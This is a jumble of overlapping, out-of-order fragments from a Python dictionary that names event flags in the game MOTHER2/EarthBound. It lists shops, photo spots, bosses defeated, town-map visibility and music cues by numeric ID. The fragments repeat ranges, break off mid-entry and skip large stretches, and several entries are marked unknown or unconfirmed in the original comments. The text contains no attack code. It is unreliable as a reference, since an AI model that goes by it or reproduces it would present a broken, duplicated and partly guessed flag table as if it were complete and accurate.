'UNDERWORLD_TENDA_GATE_OPEN', 652: 'USED_CARROT_KEY', 653: 'SHOP_DEEP_DARKNESS_ARMS_DEALER',", "never set) 770: 'LAST_ESCARGO_EXPRESS_CALL', # 771 (???) 772: 'LAST_DAD_CALL', 773: 'NERDY_GUY_AND_FAT_GUY_AT_CIRCUS_TENT', # Visibility", "235: 'SHOP_BURGLIN_PARK_JAMAICAN', 236: 'SHOP_BURGLIN_PARK_BAKERY', 237: 'SHOP_BURGLIN_PARK_CONDIMENTS', 238: 'SHOP_BURGLIN_PARK_BANANA_LADY', 239: 'SHOP_HH_DRUGSTORE_CONSUMABLES', 240: 'SHOP_HH_DRUGSTORE_EQUIPMENT', 241:", "700: 'GOT_PHOTO_CYCLE_SHOP', 701: 'GOT_PHOTO_PEACEFUL_REST_VALLEY', 702: 'GOT_PHOTO_HAPPY_HAPPY_CABIN', 703: 'GOT_PHOTO_CHAOS_THEATER', 704: 'GOT_PHOTO_LAKE_TESS', 705: 'GOT_PHOTO_BRICK_ROAD_DUNGEON', 706:", "'ZOMBIES_ON_TENT_FLOOR', 126: 'LEARNED_ABOUT_SHYNESS_BOOK', # TODO: Maybe \"can search for shyness book\"? This flag", "'PHOTO_CYCLE_SHOP_AVAILABLE', 482: 'PHOTO_PEACEFUL_REST_VALLEY_AVAILABLE', 483: 'PHOTO_HAPPY_HAPPY_CABIN_AVAILABLE', 484: 'PHOTO_CHAOS_THEATER_AVAILABLE', 485: 'PHOTO_LAKE_TESS_AVAILABLE', 486: 'PHOTO_BRICK_ROAD_DUNGEON_AVAILABLE', 487: 'PHOTO_THREED_CEMETERY_AVAILABLE',", "'HIDE_SCARABA_FOOD_TOWN_MAP', 675: 'MACH_PIZZA_ZOMBIE_PAPER_DELIVERY', 676: 'HIDE_THREED_BUS_STOP_1_TOWN_MAP', 677: 'HIDE_THREED_BUS_STOP_2_TOWN_MAP', 678: 'HIDE_FOURSIDE_BUS_STOP_TOWN_MAP', # 679 (Something about", "'POO_TELEPORTING_TO_SUMMERS', 594: 'BLOND_GUY_IN_FOURSIDE', # TODO: CONFIRM 595: 'STAR_MASTER_NEXT_TO_MU', # 596 (???) 597: 'SHOP_SCARABA_BAZAAR_FOOD',", "'ZOMBIE_CHICK_OUTSIDE_HOTEL', 47: 'BROKEN_SKYRUNNER_THREED', 48: 'FIXED_SKYRUNNER_THREED', 49: 'BOOGEY_TENT_IN_THREED', 50: 'BRICK_ROAD_OUTSIDE_DUNGEON', 51: 'SHYNESS_BOOK_AT_LIBRARY', 52: 'CAPTIVES_AT_STONEHENGE',", "'PHOTO_SCARABA_OASIS_AVAILABLE', 508: 'PHOTO_DEEP_DARKNESS_AVAILABLE', 509: 'PHOTO_TENDA_VILLAGE_AVAILABLE', 510: 'PHOTO_SATURN_VALLEY_FINAL_AVAILABLE', 511: 'GOT_TOWN_MAP', 512: 'HAS_EXIT_MOUSE', 513: 'ONETT_POST_METEORITE_MUSIC',", "Venus show about to start?) # 680 (Something about Venus show about to", "274: 'DUNGEON_MAN_AT_PALM_TREES', 275: 'LEARNED_TELEPORT', 276: 'MASTER_BARF_DEFEATED', 277: 'GUARDIAN_MOLE_1_DEFEATED', 278: 'GUARDIAN_MOLE_2_DEFEATED', 279: 'GUARDIAN_MOLE_3_DEFEATED', 280:", "388: 'MOONSIDE_MUSEUM_ROBO_PUMP_DEFEATED', 389: 'MOONSIDE_HOSPITAL_ABSTRACT_ART_DEFEATED', 390: 'GUARDIAN_HIEROGLYPH_1_DEFEATED', # The first Hieroglyph Guardian doesn't reference", "'GOT_HIEROGLYPH_COPY', 344: 'LAKE_TESS_WIND_BLOWING', # 345 (Related to Lake Tess. This is only set", "170 (???) 171: 'GOT_SATURN_LIFENOODLES', 172: 'GOT_SATURN_COIN', 173: 'GOT_SATURN_STAG_BEETLE', 174: 'DESERT_MINE_EXPANDED', # 175 (Unknown.", "'SHOP_TWOSON_DEPT_3RD_FLOOR_WOMAN', 235: 'SHOP_BURGLIN_PARK_JAMAICAN', 236: 'SHOP_BURGLIN_PARK_BAKERY', 237: 'SHOP_BURGLIN_PARK_CONDIMENTS', 238: 'SHOP_BURGLIN_PARK_BANANA_LADY', 239: 'SHOP_HH_DRUGSTORE_CONSUMABLES', 240: 'SHOP_HH_DRUGSTORE_EQUIPMENT',", "'HIDE_FOURSIDE_HOSPITAL_TOWN_MAP', 576: 'HIDE_FOURSIDE_DEPT_STORE_TOWN_MAP', 577: 'HIDE_FOURSIDE_BAKERY_TOWN_MAP', 578: 'HIDE_FOURSIDE_HOTEL_TOWN_MAP', 579: 'HIDE_SCARABA_HOTEL_TOWN_MAP', 580: 'HIDE_SCARABA_HOSPITAL_TOWN_MAP', 581: 'HIDE_SCARABA_SHOP_TOWN_MAP',", "651: 'UNDERWORLD_TENDA_GATE_OPEN', 652: 'USED_CARROT_KEY', 653: 'SHOP_DEEP_DARKNESS_ARMS_DEALER', 654: 'DEEP_DARKNESS_BUSINESSMAN_PAID_DOCTORS_FEE', 655: 'SKY_RUNNER_MUSIC', 656: 'ALT_BUY_SOUND_EFFECT', 657:", "Lake Tess. This is only set if you're near (0x02A0, 0x0D70) in a", "'QUEST_TO_ZEXONYTE', 133: 'PHASE_DISTORTER_V2_OPEN', 134: 'DELIVERED_ZEXONYTE', 135: 'TALKED_TO_BLACK_SESAME_SEED', 136: 'TRAFFIC_JAM_CLEARED', 137: 'GAVE_FOOD_TO_MONTAGUE', 138: 'TALKED_TO_WHITE_SESAME_SEED',", "'LEFT_HOME_AT_LEAST_ONCE', 751: 'CHAOS_THEATER_AUDIENCE_ABSENT', 752: 'HINT_GUY_ABSENT', 753: 'NESS_HOUSE_PHONE_RINGING', 754: 'PREVENT_TELEPORT', 755: 'GOT_INSIGNIFICANT_ITEM', 756: 'DUNGEON_MAN_IN_PARTY',", "'GUARDIAN_HIEROGLYPH_4_DEFEATED', 394: 'GUARDIAN_HIEROGLYPH_5_DEFEATED', 395: 'GUARDIAN_HIEROGLYPH_6_DEFEATED', 396: 'GUARDIAN_HIEROGLYPH_7_DEFEATED', 397: 'GUARDIAN_HIEROGLYPH_8_DEFEATED', 398: 'GUARDIAN_HIEROGLYPH_9_DEFEATED', 399: 'GUARDIAN_HIEROGLYPH_10_DEFEATED',", "9: 'TEMP_9', 10: 'TEMP_10', 11: 'ENEMY_SUPPRESS', 12: 'PAULAS_PARENTS_KNOW_ABOUT_HH_RESCUE', 13: 'PAULA_JOINS', 14: 'JEFF_JOINS', 15:", "'GOT_PHOTO_FOURSIDE_BRIDGE', 713: 'GOT_PHOTO_FOURSIDE_MUSEUM_OUTSIDE', 714: 'GOT_PHOTO_FOURSIDE_MUSEUM_INSIDE', 715: 'GOT_PHOTO_MONOTOLI_BUILDING', 716: 'GOT_PHOTO_FOURSIDE_DEPT_STORE', 717: 'GOT_PHOTO_POOS_PALACE_INSIDE', 718: 'GOT_PHOTO_POOS_PALACE_OUTSIDE',", "'CARPAINTER_HAS_KEY', 123: 'BLUE_COW_ALT_TEXT', 124: 'ZOMBIE_PAPER_ON_TENT', 125: 'ZOMBIES_ON_TENT_FLOOR', 126: 'LEARNED_ABOUT_SHYNESS_BOOK', # TODO: Maybe \"can", "to traffic jam?) # 371 (???) 372: 'PARTY_IS_ROBOTIFIED', # 373 (Unknown. Related to", "'ORANGE_KID_ALT_TEXT', 117: 'INVESTED_IN_ORANGE_KID', 118: 'PAULAS_DAD_OUTSIDE', 119: 'RUNAWAY_FIVE_FREE_FROM_CHAOS_THEATER', 120: 'SHOPPED_AT_FOOD_STAND', 121: 'DID_NOT_PAY_FOOD_STAND', 122: 'CARPAINTER_HAS_KEY',", "don't talk to Apple Kid 127: 'TALKED_TO_ANDONUTS_1', 128: 'JEFF_STARTS_HIS_JOURNEY', 129: 'TESSIE_EMERGES', 130: 'TALKED_TO_ANDONUTS_2',", "312: 'GHOSTS_BLOCKING_THREED', # 313 (Unknown. Something about the City Bus?) # 314 (Unknown.", "572 (???) 573: 'HIDE_THREED_BAKERY_TOWN_MAP', 574: 'HIDE_THREED_HOSPITAL_TOWN_MAP', 575: 'HIDE_FOURSIDE_HOSPITAL_TOWN_MAP', 576: 'HIDE_FOURSIDE_DEPT_STORE_TOWN_MAP', 577: 'HIDE_FOURSIDE_BAKERY_TOWN_MAP', 578:", "612: 'EVERDRED_NOT_AT_ROOF', 613: 'TELEPORT_MONKEY_NOT_AT_CAVE', 614: 'TELEPORT_MONKEY_NEAR_MONKEY_CAVE_ENTRANCE', 615: 'TELEPORT_MONKEY_NEAR_DESERT_ROAD', 616: 'TENDAKRAUT_STOLEN', 617: 'MAGIC_CAKE_LADY_AT_BEACH', 618:", "on death. TODO: Investigate) 476: 'POLICE_BARRIERS_AT_ONETT_HILLTOP', 477: 'NESS_SLEEPING_AT_HIS_BED', 478: 'SHOP_SCARABA_CONDIMENTS', 479: 'PHOTO_NESS_HOUSE_AVAILABLE', 480:", "493: 'PHOTO_FOURSIDE_BRIDGE_AVAILABLE', 494: 'PHOTO_FOURSIDE_MUSEUM_OUTSIDE_AVAILABLE', 495: 'PHOTO_FOURSIDE_MUSEUM_INSIDE_AVAILABLE', 496: 'PHOTO_MONOTOLI_BUILDING_AVAILABLE', 497: 'PHOTO_FOURSIDE_DEPT_STORE_AVAILABLE', 498: 'PHOTO_POOS_PALACE_INSIDE_AVAILABLE', 499:", "376 (Unknown. Set after Apple Kid calls you about the Gourmet Yogurt Machine)", "to PREVENT_TELEPORT?) # 780 (If set, Maxwell doesn't actually save your game. WHAT?)", "'PHOTO_CHAOS_THEATER_AVAILABLE', 485: 'PHOTO_LAKE_TESS_AVAILABLE', 486: 'PHOTO_BRICK_ROAD_DUNGEON_AVAILABLE', 487: 'PHOTO_THREED_CEMETERY_AVAILABLE', 488: 'PHOTO_GRAPEFRUIT_FALLS_AVAILABLE', 489: 'PHOTO_SATURN_VALLEY_COFFEE_AVAILABLE', 490: 'PHOTO_CIRCUS_TENT_AVAILABLE',", "# 228 (I hate multipurpose flags) # 229 (I hate multipurpose flags) #", "725: 'GOT_PHOTO_PYRAMID', 726: 'GOT_PHOTO_SCARABA_OASIS', 727: 'GOT_PHOTO_DEEP_DARKNESS', 728: 'GOT_PHOTO_TENDA_VILLAGE', 729: 'GOT_PHOTO_SATURN_VALLEY_FINAL', 730: 'TALKED_TO_ONETT_BAKERY_LADY_TWICE', 731:", "'GOT_MAGIC_TRUFFLE_3', 442: 'GOT_MAGIC_TRUFFLE_4', 443: 'GOT_MAGIC_TRUFFLE_5', 444: 'KING_JOINS', 445: 'TALKED_TO_BRICK_ROADS_HEAD', 446: 'FOR_SALE_SIGN_CUSTOMER_1', # 447", "hate multipurpose flags) 234: 'SHOP_TWOSON_DEPT_3RD_FLOOR_WOMAN', 235: 'SHOP_BURGLIN_PARK_JAMAICAN', 236: 'SHOP_BURGLIN_PARK_BAKERY', 237: 'SHOP_BURGLIN_PARK_CONDIMENTS', 238: 'SHOP_BURGLIN_PARK_BANANA_LADY',", "# 229 (I hate multipurpose flags) # 230 (I hate multipurpose flags) #", "'FOURSIDE_SEWERS_OPEN', 59: 'ELECTRA_OUTSIDE_BUILDING', 60: 'EVERDRED_OUTSIDE_CAFE', 61: 'MAGIC_CAKE_LADY_IDENTIFIED', 62: 'DUNGEON_MAN_IN_DESERT', 63: 'PATH_TO_MANI_MANI_OPEN', 64: 'FRANKYSTEIN_MKII_DEFEATED',", "'INVESTED_IN_ORANGE_KID', 118: 'PAULAS_DAD_OUTSIDE', 119: 'RUNAWAY_FIVE_FREE_FROM_CHAOS_THEATER', 120: 'SHOPPED_AT_FOOD_STAND', 121: 'DID_NOT_PAY_FOOD_STAND', 122: 'CARPAINTER_HAS_KEY', 123: 'BLUE_COW_ALT_TEXT',", "'BRICK_ROAD_DUNGEON_MOUSE_2_DEFEATED', 422: 'ONETT_DAYTIME', 423: 'UNDERWORLD_TALKING_ROCK_STOPPED_TALKING', 424: 'TENDA_SHOP_PLAIN_ROLL_1', 425: 'TENDA_SHOP_PLAIN_YOGURT', 426: 'TENDA_SHOP_PLAIN_ROLL_2', 427: 'TENDA_SHOP_SPICY_JERKY',", "about to start?) # 680 (Something about Venus show about to start?) 681:", "757: 'GEORGE_HAS_DIAMOND', 758: 'GOING_TO_MAGICANT_MUSIC', 759: 'VENUS_AND_RUNAWAY_FANS_AT_TOPOLLA', # Visibility flag for NPCs #851 and", "278: 'GUARDIAN_MOLE_2_DEFEATED', 279: 'GUARDIAN_MOLE_3_DEFEATED', 280: 'GUARDIAN_MOLE_4_DEFEATED', 281: 'GUARDIAN_MOLE_5_DEFEATED', # 282 (Five moles defeated?", "443: 'GOT_MAGIC_TRUFFLE_5', 444: 'KING_JOINS', 445: 'TALKED_TO_BRICK_ROADS_HEAD', 446: 'FOR_SALE_SIGN_CUSTOMER_1', # 447 (???) # 448", "'NESS_HOUSE_DOOR_KNOCKING', 296: 'ZOMBIE_CHICK_AT_HOTEL_1', # First hotel room 297: 'ZOMBIE_CHICK_AT_HOTEL_2', # Second hotel room", "about the City Bus?) # 314 (Unknown. Something about the Runaway Five Bus?)", "742: 'LARDNA_AT_HOME', 743: 'VISITED_HAPPY_HAPPY_VILLAGE', 744: 'TALKED_TO_CARPAINTER', 745: 'QUEST_TO_YOGURT_MACHINE', 746: 'SCAM_HOUSE_UNLOCKED', # 747 (???", "169: 'PHASE_DISTORTER_V2_BEING_FINISHED', # 170 (???) 171: 'GOT_SATURN_LIFENOODLES', 172: 'GOT_SATURN_COIN', 173: 'GOT_SATURN_STAG_BEETLE', 174: 'DESERT_MINE_EXPANDED',", "577: 'HIDE_FOURSIDE_BAKERY_TOWN_MAP', 578: 'HIDE_FOURSIDE_HOTEL_TOWN_MAP', 579: 'HIDE_SCARABA_HOTEL_TOWN_MAP', 580: 'HIDE_SCARABA_HOSPITAL_TOWN_MAP', 581: 'HIDE_SCARABA_SHOP_TOWN_MAP', 582: 'HIDE_SUMMERS_HOTEL_TOWN_MAP', 583:", "someone in Threed?) # 589 (Visibility flag for some Hotel Attendant?) 590: 'HAPPY_THREED_PEOPLE',", "'GOT_RECEIVER_PHONE', 83: 'GOT_PENCIL_ERASER', 84: 'GOT_HAND_AID', 85: 'GOT_WAD_OF_BILLS', 86: 'GOT_FRANKLIN_BADGE', 87: 'GOT_FLY_HONEY', 88: 'GOT_BAD_KEY_MACHINE',", "'SHOP_SUMMERS_SHOP', 266: 'SHOP_SUMMERS_RESTAURANT', 267: 'SHOP_TOTO_SHOP', 268: 'SHOP_SUMMERS_GELATO', 269: 'SHOP_MAGIC_CAKE_LADY', 270: 'SHOP_DALAAM_RESTAURANT', 271: 'SHOP_SCARABA_HASSANS_SHOP',", "mine?) 608: 'DESERT_MINE_TO_EXPAND_NEXT_NIGHT', 609: 'WINTERS_PENCIL_ERASED', 610: 'DETECTIVE_IN_THREED', # 611 (Something about talking to", "'FLYING_MAN_MUSIC', # 588 (Visibility flag for someone in Threed?) # 589 (Visibility flag", "183: 'GOT_MELODY_LILLIPUT_STEPS', 184: 'GOT_MELODY_RAINY_CIRCLE', 185: 'GOT_MELODY_MILKY_WELL', 186: 'GOT_MELODY_MAGNET_HILL', 187: 'GOT_MELODY_PINK_CLOUD', 188: 'GOT_MELODY_LUMINE_HALL', 189:", "# Second hotel room 298: 'ZOMBIE_CHICK_AT_HOTEL_3', # Third hotel room 299: 'IRON_ERASER_ERASED', 300:", "148: 'READ_HIEROGLYPHS', 149: 'POO_STARTS_HIS_JOURNEY', # 150 (Related to Poo's journey) 151: 'QUEST_TO_SUBMARINE', 152:", "678: 'HIDE_FOURSIDE_BUS_STOP_TOWN_MAP', # 679 (Something about Venus show about to start?) # 680", "about Paula's Dad acknowledging the kidnapping) 322: 'PAULAS_DAD_NOTICED_SHES_NOT_HOME', 323: 'GOT_PAK_OF_BUBBLE_GUM', 324: 'SHOP_RED_SNAKE', 325:", "'SHOP_SCARABA_CONDIMENTS', 479: 'PHOTO_NESS_HOUSE_AVAILABLE', 480: 'PHOTO_SCAM_HOUSE_AVAILABLE', 481: 'PHOTO_CYCLE_SHOP_AVAILABLE', 482: 'PHOTO_PEACEFUL_REST_VALLEY_AVAILABLE', 483: 'PHOTO_HAPPY_HAPPY_CABIN_AVAILABLE', 484: 'PHOTO_CHAOS_THEATER_AVAILABLE',", "556: 'FOURSIDE_DEPT_BLACKOUT_JUST_ENDED', 557: 'READY_TO_SAIL_TO_SCARABA', 558: 'HIDE_ONETT_DRUGSTORE_TOWN_MAP', 559: 'HIDE_ONETT_BURGER_SHOP_TOWN_MAP', 560: 'HIDE_ONETT_HOTEL_TOWN_MAP', 561: 'HIDE_ONETT_HOSPITAL_TOWN_MAP', 562:", "39: 'COP_AT_STATION_ENTRANCE', 40: 'SHARK_GUARDING_FRANK_DEFEATED', 41: 'CHAOS_THEATER_STAGE_UNBLOCKED', 42: 'APPLE_KID_IN_BURGLIN_PARK', 43: 'RUNAWAY_FIVE_FAN_GIRL_OUTSIDE_BACKSTAGE', 44: 'POKEY_OUTSIDE_HH_HQ', 45:", "'ESCARGO_EXPRESS_HAS_PAULAS_PENCIL_ERASER', 693: 'ESCARGO_EXPRESS_HAS_POOS_HAWK_EYE', 694: 'ESCARGO_EXPRESS_PENCIL_ERASER_DELIVERY', 695: 'ESCARGO_EXPRESS_HAWK_EYE_DELIVERY', 696: 'RANDOM_JEFF_ITEM_FIX_CHANCE', 697: 'SHARK_AT_ARCADE_UPSTAIRS_DEFEATED', 698: 'GOT_PHOTO_NESS_HOUSE',", "get calls from Dad?) 776: 'PAULA_AT_MONOTOLI_BUILDING', 777: 'GOT_SYNESS_BOOK_BACK_FROM_TENDA', 778: 'EXIT_MOUSE_ASLEEP', # 779 (Related", "Something about Runaway Five Tour Bus???) 748: 'SKY_RUNNER_AT_WINTERS_LAB', 749: 'NESS_WEARING_PAJAMAS', 750: 'LEFT_HOME_AT_LEAST_ONCE', 751:", "'GUARDIAN_HIEROGLYPH_12_DEFEATED', 402: 'GUARDIAN_HIEROGLYPH_13_DEFEATED', 403: 'GUARDIAN_HIEROGLYPH_14_DEFEATED', 404: 'GUARDIAN_HIEROGLYPH_15_DEFEATED', 405: 'GUARDIAN_HIEROGLYPH_16_DEFEATED', 406: 'GUARDIAN_HIEROGLYPH_17_DEFEATED', 407: 'LETHAL_ASP_HIEROGLYPH_1_DEFEATED',", "'GAVE_FOOD_TO_APPLE_KID', 552: 'GOT_ZOMBIE_PAPER', 553: 'GOT_BACKSTAGE_PASS', 554: 'GOT_YOGURT_DISPENSER', 555: 'FOURSIDE_DEPT_LIGHTS_OUT', 556: 'FOURSIDE_DEPT_BLACKOUT_JUST_ENDED', 557: 'READY_TO_SAIL_TO_SCARABA',", "for MOTHER2/Earthbound # Luckily, every version uses the same flag IDs FLAG_NAMES =", "95: 'DAD_CALLING_HOME', 96: 'POKEY_WAITING_MOM_GOODBYE', 97: 'NESS_HOUSE_POKEY_MUSIC', 98: 'ANSWERED_DADS_CALL', 99: 'BOUGHT_SCAM_HOUSE', 100: 'KING_WONT_JOIN', 101:", "# 314 (Unknown. Something about the Runaway Five Bus?) 315: 'GHOSTS_BLOCKING_TWOSON', # 316", "670: 'GOT_FOR_SALE_SIGN', # 671 (???) 672: 'POKEY_FLIES_AWAY_BY_HELICOPTER', 673: 'HIDE_TWOSON_BURGLIN_BAKERY_TOWN_MAP', 674: 'HIDE_SCARABA_FOOD_TOWN_MAP', 675: 'MACH_PIZZA_ZOMBIE_PAPER_DELIVERY',", "76: 'GOT_TRACY_COOKIE', 77: 'GOT_MR_BASEBALL_CAP', 78: 'GOT_ENTERTAINERS_TRAVEL_CHARM', 79: 'GOT_METEORITE_PIECE', 80: 'GOT_KEY_TO_SHACK', 81: 'HAS_BICYCLE', 82:", "230 (I hate multipurpose flags) # 231 (I hate multipurpose flags) # 232", "'GOT_MELODY_RAINY_CIRCLE', 185: 'GOT_MELODY_MILKY_WELL', 186: 'GOT_MELODY_MAGNET_HILL', 187: 'GOT_MELODY_PINK_CLOUD', 188: 'GOT_MELODY_LUMINE_HALL', 189: 'GOT_MELODY_FIRE_SPRING', 190: 'CONQUERED_SANCTUARY_1',", "758: 'GOING_TO_MAGICANT_MUSIC', 759: 'VENUS_AND_RUNAWAY_FANS_AT_TOPOLLA', # Visibility flag for NPCs #851 and #852 760:", "'GUARDIAN_HIEROGLYPH_11_DEFEATED', 401: 'GUARDIAN_HIEROGLYPH_12_DEFEATED', 402: 'GUARDIAN_HIEROGLYPH_13_DEFEATED', 403: 'GUARDIAN_HIEROGLYPH_14_DEFEATED', 404: 'GUARDIAN_HIEROGLYPH_15_DEFEATED', 405: 'GUARDIAN_HIEROGLYPH_16_DEFEATED', 406: 'GUARDIAN_HIEROGLYPH_17_DEFEATED',", "(???) 165: 'INVISIBLE_MAN_JOINS', 166: 'MOONSIDE_COUNTDOWN_GUY_1', 167: 'MOONSIDE_COUNTDOWN_GUY_2', 168: 'MOONSIDE_COUNTDOWN_GUY_3', 169: 'PHASE_DISTORTER_V2_BEING_FINISHED', # 170", "309: 'RUNAWAY_BUS_FROM_TWOSON_TO_THREED', 310: 'POKEY_WAITING_AT_COUCH', 311: 'WINTERS_ROPE_LOWERED', 312: 'GHOSTS_BLOCKING_THREED', # 313 (Unknown. Something about", "179: 'LARGE_PIZZA_DELIVERY', 180: 'PIZZA_DELIVERY', 181: 'ESCARGO_EXPRESS_DELIVERY', 182: 'GOT_MELODY_GIANT_STEP', 183: 'GOT_MELODY_LILLIPUT_STEPS', 184: 'GOT_MELODY_RAINY_CIRCLE', 185:", "'STARMAN_DX_ABSENT', # (Another flag for Starman DX defeated. One of them might be", "234: 'SHOP_TWOSON_DEPT_3RD_FLOOR_WOMAN', 235: 'SHOP_BURGLIN_PARK_JAMAICAN', 236: 'SHOP_BURGLIN_PARK_BAKERY', 237: 'SHOP_BURGLIN_PARK_CONDIMENTS', 238: 'SHOP_BURGLIN_PARK_BANANA_LADY', 239: 'SHOP_HH_DRUGSTORE_CONSUMABLES', 240:", "in Threed, cleared when defeating Belch) 762: 'DUNGEON_MAN_GOODBYE_EXIT_SIGN', 763: 'PICKY_KNOCKING_ON_DOOR', 764: 'READY_TO_LEARN_TELEPORT', 765:", "'HIDE_ONETT_HOSPITAL_TOWN_MAP', 562: 'HIDE_ONETT_BAKERY_TOWN_MAP', 563: 'HIDE_ONETT_TO_TWOSON_TOWN_MAP', 564: 'HIDE_TWOSON_HOTEL_TOWN_MAP', 565: 'HIDE_TWOSON_DEPT_STORE_TOWN_MAP', 566: 'HIDE_TWOSON_TO_ONETT_TOWN_MAP', 567: 'HIDE_TWOSON_BUS_STOP_TOWN_MAP',", "65 (???) 66: 'EVERDRED_DEFEATED', 67: 'FOOD_STAND_MONITOR_DEFEATED', 68: 'CARPAINTER_DEFEATED', 69: 'BOOGEY_TENT_DEFEATED', 70: 'STARMAN_DX_DEFEATED', 71:", "654: 'DEEP_DARKNESS_BUSINESSMAN_PAID_DOCTORS_FEE', 655: 'SKY_RUNNER_MUSIC', 656: 'ALT_BUY_SOUND_EFFECT', 657: 'BOUGHT_OR_SOLD_AT_SHOP', 658: 'BOUGHT_WEAPON', 659: 'MOONSIDE_SWITCH_YES_NO', 660:", "97: 'NESS_HOUSE_POKEY_MUSIC', 98: 'ANSWERED_DADS_CALL', 99: 'BOUGHT_SCAM_HOUSE', 100: 'KING_WONT_JOIN', 101: 'LEARNED_THAT_LIER_SOLD_THE_MANI_MANI', 102: 'TALKED_TO_SHYGUY_ABOUT_SHYNESS_BOOK', 103:", "'SHOP_FOURSIDE_DEPT_CONDIMENTS', 263: 'SHOP_FOURSIDE_DEPT_ARMS_DEALER', 264: 'SHOP_FOURSIDE_PUNK_GUY', 265: 'SHOP_SUMMERS_SHOP', 266: 'SHOP_SUMMERS_RESTAURANT', 267: 'SHOP_TOTO_SHOP', 268: 'SHOP_SUMMERS_GELATO',", "be responsible only for palette changes, maybe) 435: 'GUARDIAN_GENERAL_DEFEATED', 436: 'SEA_OF_EDEN_KRAKEN_1_DEFEATED', 437: 'SEA_OF_EDEN_KRAKEN_2_DEFEATED',", "448 (???) 449: 'CAPTAIN_STRONG_AT_STATION_ENTRANCE', 450: 'CAPTAIN_STRONG_NOT_AT_STATION_DESK', 451: 'MONKEY_CAVE_SKIP_SANDWICH', 452: 'MONKEY_CAVE_PICNIC_LUNCH', 453: 'MONKEY_CAVE_WET_TOWEL', 454:", "'PHOTO_FOURSIDE_BRIDGE_AVAILABLE', 494: 'PHOTO_FOURSIDE_MUSEUM_OUTSIDE_AVAILABLE', 495: 'PHOTO_FOURSIDE_MUSEUM_INSIDE_AVAILABLE', 496: 'PHOTO_MONOTOLI_BUILDING_AVAILABLE', 497: 'PHOTO_FOURSIDE_DEPT_STORE_AVAILABLE', 498: 'PHOTO_POOS_PALACE_INSIDE_AVAILABLE', 499: 'PHOTO_POOS_PALACE_OUTSIDE_AVAILABLE',", "(???) 111: 'VISITED_PEACEFUL_REST_PENCIL', 112: 'INVESTED_IN_APPLE_KID', 113: 'STUBBY_LEGS', 114: 'TWOSON_DEPT_MAN', 115: 'CHAOS_THEATER_BACKSTAGE_OPEN', 116: 'ORANGE_KID_ALT_TEXT',", "# 596 (???) 597: 'SHOP_SCARABA_BAZAAR_FOOD', 598: 'SHOP_SCARABA_WATER', 599: 'SHOP_SOUTH_SCARABA_VARIETY', 600: 'SHOP_DEEP_DARKNESS_BUSINESSMAN', 601: 'SHATTERED_MAN_1_DEFEATED',", "180: 'PIZZA_DELIVERY', 181: 'ESCARGO_EXPRESS_DELIVERY', 182: 'GOT_MELODY_GIANT_STEP', 183: 'GOT_MELODY_LILLIPUT_STEPS', 184: 'GOT_MELODY_RAINY_CIRCLE', 185: 'GOT_MELODY_MILKY_WELL', 186:", "battle 387: 'MOONSIDE_CAFE_ROBO_PUMP_DEFEATED', 388: 'MOONSIDE_MUSEUM_ROBO_PUMP_DEFEATED', 389: 'MOONSIDE_HOSPITAL_ABSTRACT_ART_DEFEATED', 390: 'GUARDIAN_HIEROGLYPH_1_DEFEATED', # The first Hieroglyph", "# 588 (Visibility flag for someone in Threed?) # 589 (Visibility flag for", "Third hotel room 299: 'IRON_ERASER_ERASED', 300: 'ZOMBIE_GUARDS_AWAY', 301: 'POKEY_WAITING_AT_DOOR', # 302 (???) 303:", "'PHOTO_TENDA_VILLAGE_AVAILABLE', 510: 'PHOTO_SATURN_VALLEY_FINAL_AVAILABLE', 511: 'GOT_TOWN_MAP', 512: 'HAS_EXIT_MOUSE', 513: 'ONETT_POST_METEORITE_MUSIC', 514: 'JUST_RESTED_AT_HOME', 515: 'FRANK_DEFEATED',", "hate multipurpose flags) # 230 (I hate multipurpose flags) # 231 (I hate", "440: 'GOT_MAGIC_TRUFFLE_2', 441: 'GOT_MAGIC_TRUFFLE_3', 442: 'GOT_MAGIC_TRUFFLE_4', 443: 'GOT_MAGIC_TRUFFLE_5', 444: 'KING_JOINS', 445: 'TALKED_TO_BRICK_ROADS_HEAD', 446:", "(???) # 378 (???) 379: 'ANDONUTS_AT_LAB_ABSENT', # 380 (???) # 381 (???) 382:", "'RECEIVED_APPLE_KID_CALL_ABOUT_PENCIL_ERASER', 342: 'PYRAMID_OPEN', 343: 'GOT_HIEROGLYPH_COPY', 344: 'LAKE_TESS_WIND_BLOWING', # 345 (Related to Lake Tess.", "'GUARDIAN_MOLE_5_DEFEATED', # 282 (Five moles defeated? How does this differ from 72?) #", "'DID_NOT_PAY_FOOD_STAND', 122: 'CARPAINTER_HAS_KEY', 123: 'BLUE_COW_ALT_TEXT', 124: 'ZOMBIE_PAPER_ON_TENT', 125: 'ZOMBIES_ON_TENT_FLOOR', 126: 'LEARNED_ABOUT_SHYNESS_BOOK', # TODO:", "597: 'SHOP_SCARABA_BAZAAR_FOOD', 598: 'SHOP_SCARABA_WATER', 599: 'SHOP_SOUTH_SCARABA_VARIETY', 600: 'SHOP_DEEP_DARKNESS_BUSINESSMAN', 601: 'SHATTERED_MAN_1_DEFEATED', 602: 'SHATTERED_MAN_2_DEFEATED', 603:", "131: 'WATERFALL_WAIT_ENABLED', 132: 'QUEST_TO_ZEXONYTE', 133: 'PHASE_DISTORTER_V2_OPEN', 134: 'DELIVERED_ZEXONYTE', 135: 'TALKED_TO_BLACK_SESAME_SEED', 136: 'TRAFFIC_JAM_CLEARED', 137:", "'PRESENTS_AT_SATURN_VALLEY', 629: 'PARTY_IS_DIRTY_FROM_BELCH_FIGHT', 630: 'BUBBLE_MONKEY_AT_LAKE_TESS', 631: 'TALKED_TO_MOONSIDE_MONOTOLI', 632: 'MONSTERS_IN_ONETT', 633: 'LIERS_HOUSE_UNLOCKED', 634: 'PAULA_TELEPATHY_DREAM_1',", "156 (???) # 157 (???) # 158 (???) 159: 'CHECKED_LAST_FLYING_MAN_TOMBSTONE', # 160 (???)", "'SHOP_FOURSIDE_DEPT_BAKERY', 259: 'SHOP_FOURSIDE_DEPT_4TH_FLOOR_TOYS', 260: 'SHOP_FOURSIDE_DEPT_4TH_FLOOR_SPORTS', 261: 'SHOP_FOURSIDE_DEPT_BURGER', 262: 'SHOP_FOURSIDE_DEPT_CONDIMENTS', 263: 'SHOP_FOURSIDE_DEPT_ARMS_DEALER', 264: 'SHOP_FOURSIDE_PUNK_GUY',", "532: 'NESS_ROOM_METEORITE_FALLING_MUSIC', 533: 'NESS_ROOM_METEORITE_CRASH_MUSIC', 534: 'CITY_BUS_MUSIC', 535: 'RUNAWAY_BUS_OR_SKY_RUNNER_FALLING_MUSIC', 536: 'RUNAWAY_FIVE_FREE_MUSIC', 537: 'TESSIE_MUSIC', #", "when you talk to Tracy after defeating Giygas, but never set) 770: 